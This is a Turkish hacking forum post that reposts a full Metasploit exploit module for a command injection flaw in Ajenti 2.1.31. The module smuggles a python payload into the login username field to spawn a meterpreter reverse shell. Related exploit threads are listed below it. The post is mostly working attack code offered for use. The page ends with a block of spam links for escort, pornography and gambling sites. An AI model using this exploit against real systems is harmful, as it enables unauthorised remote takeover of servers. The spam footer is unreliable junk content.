[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Ajenti 2.1.31 Command Injection Exploit

#1
Ajenti 2.1.31 Command Injection Exploit

Kod:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
   super(update_info(info,
     'Name'            => 'Ajenti auth username Command Injection',
     'Description'     => %q{
       This module exploits a command injection in Ajenti == 2.1.31.
       By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
     },
     'Author'          => [
       'Jeremy Brown', # Vulnerability discovery
       'Onur ER <[email protected]>' # Metasploit module
     ],
     'References'      => [
       ['EDB', '47497']
     ],
     'DisclosureDate'  => '2019-10-14',
     'License'         => MSF_LICENSE,
     'Platform'        => 'python',
     'Arch'            => ARCH_PYTHON,
     'Privileged'      => false,
     'Targets'         => [
       ['Ajenti == 2.1.31', {}]
     ],
     'DefaultOptions'  =>
         {
           'RPORT'   => 8000,
           'SSL'     => true,
           'payload' => 'python/meterpreter/reverse_tcp'
         },
     'DefaultTarget'   => 0
   ))
   register_options([
     OptString.new('TARGETURI', [true, 'Base path', '/'])
   ])
 end

 def check
   res = send_request_cgi({
     'method' => 'GET',
     'uri'    => '/view/login/normal'
   })

   unless res
     vprint_error 'Connection failed'
     return CheckCode::Unknown
   end

   unless res.body =~ /ajenti/i
     return CheckCode::Safe
   end

   version = res.body.scan(/'ajentiVersion', '([\d\.]+)'/).flatten.first

   if version
     vprint_status "Ajenti version #{version}"
   end

   if version == '2.1.31'
     return CheckCode::Appears
   end

   CheckCode::Detected
 end

 def exploit
   print_status('Exploiting...')
   json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
                 'password' => rand_text_alpha_lower(7),
                 'mode' => 'normal'
   }
   send_request_cgi({
     'method' => 'POST',
     'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
     'ctype'  => 'application/json',
     'data'   => JSON.generate(json_body)
   })
 end
end

#  0day.today [2019-12-04]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Wordpress Powie WHOIS Domain Check 0.9.31 Plugin Exploit 0bir 1 13 07-10-2020, 06:53 AM
Son Mesaj: drjacob
  Online Shopping Portal 3.1 - (email) SQL Injection Vulnerability 0bir 0 7 07-09-2020, 10:45 PM
Son Mesaj: 0bir
  Sickbeard 0.1 - Remote Command Injection Exploit 0bir 0 4 07-09-2020, 10:44 PM
Son Mesaj: 0bir
  rauLink Software Domotica Web 2.0 SQL Injection Vulnerability 0bir 0 6 07-09-2020, 10:43 PM
Son Mesaj: 0bir
  rauLink Software Domotica Web 2.0 SQL Injection Vulnerability 0bir 0 3 07-09-2020, 10:43 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort En iyi bahis siteleri porno beylikdüzü escort avcılar escort eskişehir escort porno cami halısı taksim escort